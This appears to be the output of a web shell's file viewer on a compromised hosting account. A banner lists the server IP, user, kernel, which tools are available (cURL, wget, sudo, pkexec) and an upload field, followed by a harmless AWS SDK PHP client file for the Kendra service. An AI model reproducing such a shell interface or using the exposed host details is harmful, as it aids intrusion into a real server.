Server IP : 184.154.167.98 / Your IP : 18.223.238.150 Web Server : Apache System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 User : puertode ( 1767) PHP Version : 7.2.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/puertode/public_html/fotografico/3rdparty/aws/aws-sdk-php/src/kendra/ |
Upload File : |
<?php namespace Aws\kendra; use Aws\AwsClient; /** * This client is used to interact with the **AWSKendraFrontendService** service. * @method \Aws\Result batchDeleteDocument(array $args = []) * @method \GuzzleHttp\Promise\Promise batchDeleteDocumentAsync(array $args = []) * @method \Aws\Result batchPutDocument(array $args = []) * @method \GuzzleHttp\Promise\Promise batchPutDocumentAsync(array $args = []) * @method \Aws\Result createDataSource(array $args = []) * @method \GuzzleHttp\Promise\Promise createDataSourceAsync(array $args = []) * @method \Aws\Result createFaq(array $args = []) * @method \GuzzleHttp\Promise\Promise createFaqAsync(array $args = []) * @method \Aws\Result createIndex(array $args = []) * @method \GuzzleHttp\Promise\Promise createIndexAsync(array $args = []) * @method \Aws\Result deleteFaq(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteFaqAsync(array $args = []) * @method \Aws\Result deleteIndex(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteIndexAsync(array $args = []) * @method \Aws\Result describeDataSource(array $args = []) * @method \GuzzleHttp\Promise\Promise describeDataSourceAsync(array $args = []) * @method \Aws\Result describeFaq(array $args = []) * @method \GuzzleHttp\Promise\Promise describeFaqAsync(array $args = []) * @method \Aws\Result describeIndex(array $args = []) * @method \GuzzleHttp\Promise\Promise describeIndexAsync(array $args = []) * @method \Aws\Result listDataSourceSyncJobs(array $args = []) * @method \GuzzleHttp\Promise\Promise listDataSourceSyncJobsAsync(array $args = []) * @method \Aws\Result listDataSources(array $args = []) * @method \GuzzleHttp\Promise\Promise listDataSourcesAsync(array $args = []) * @method \Aws\Result listFaqs(array $args = []) * @method \GuzzleHttp\Promise\Promise listFaqsAsync(array $args = []) * @method \Aws\Result listIndices(array $args = []) * @method \GuzzleHttp\Promise\Promise listIndicesAsync(array $args = []) * @method \Aws\Result query(array $args = []) * @method \GuzzleHttp\Promise\Promise queryAsync(array $args = []) * @method \Aws\Result startDataSourceSyncJob(array $args = []) * @method \GuzzleHttp\Promise\Promise startDataSourceSyncJobAsync(array $args = []) * @method \Aws\Result stopDataSourceSyncJob(array $args = []) * @method \GuzzleHttp\Promise\Promise stopDataSourceSyncJobAsync(array $args = []) * @method \Aws\Result submitFeedback(array $args = []) * @method \GuzzleHttp\Promise\Promise submitFeedbackAsync(array $args = []) * @method \Aws\Result updateDataSource(array $args = []) * @method \GuzzleHttp\Promise\Promise updateDataSourceAsync(array $args = []) * @method \Aws\Result updateIndex(array $args = []) * @method \GuzzleHttp\Promise\Promise updateIndexAsync(array $args = []) */ class kendraClient extends AwsClient {}